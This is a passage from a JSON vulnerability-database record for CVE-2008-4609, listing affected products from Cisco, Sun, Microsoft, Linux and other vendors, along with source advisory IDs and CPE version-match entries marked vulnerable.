      {
        "model": "opensolaris build snv 47",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "4.2.10"
      },
      {
        "model": "opensolaris build snv 64",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2 irc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "ios 12.4 jda3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 37",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "opensolaris build snv 101",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows professional sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "ios 12.3 bc9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 115",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.3bc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2zu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "solaris 10 x86",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.3ya",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 src3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks self service voicexml",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "windows vista enterprise sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.4xy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rt140e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(9)"
      },
      {
        "model": "ios 12.4 md",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows xp professional sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2srb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos 7.6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.3"
      },
      {
        "model": "ios 12.4 xr4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista business 64-bit edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.2(2)"
      },
      {
        "model": "linux enterprise sdk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "0"
      },
      {
        "model": "solaris 9 x86",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home premium 64-bit edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2zb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0db",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "point software vpn-1 power/utm r65 hfa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "50"
      },
      {
        "model": "ios 12.3 bc6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "suse linux openexchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "4.0"
      },
      {
        "model": "ios 12.4 xq2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(8)"
      },
      {
        "model": "windows server datacenter edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios 12.0dc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3 jec3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "ios 12.2tpc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos 8.7",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 116",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.4 ye",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 127",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows server datacenter edition itanium sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "bigip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.3.1"
      },
      {
        "model": "networks secure network access identity engine guest manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "ios 12.2 mc2m",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center multimedia \u0026 outbound",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "7.0"
      },
      {
        "model": "ios 12.0sx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 86",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#723308"
      },
      {
        "db": "BID",
        "id": "31545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-4609"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16\\)sc3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(3.4\\)bp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3ym:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(11b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)s7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(19\\)ew:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(2\\)e1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(8\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)ym4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)sz1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(7b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(10\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)ew2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)sy03:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(6.8a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)bx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(6.8\\)t1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)xe4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:1.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)e3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16.06\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(26\\)p5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(4\\)f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(27\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(26\\)e3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xs:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xd1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(28\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(12\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(22\\)sy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(27\\)sv2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11.5\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)t5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:2.0.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)t4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0\\(20.3\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(6\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)sc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0st:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)ea1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)ys_1.2\\(1\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(19\\)e1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(22\\)ea6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)s4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:5.2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.5.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)t9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3bc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3ma:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(36\\)ca2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)yb4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(22\\)ea3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(12\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(7\\)da3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1x\\(l\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zd3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)dc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12\\)da9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)yw2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sxe3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)sec1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2cz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)t1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(28c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xd1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.68:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.54:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17b\\)sxa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)t10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsd:bsd:4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)yq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(6\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3ya:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.9.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.35.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.39:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
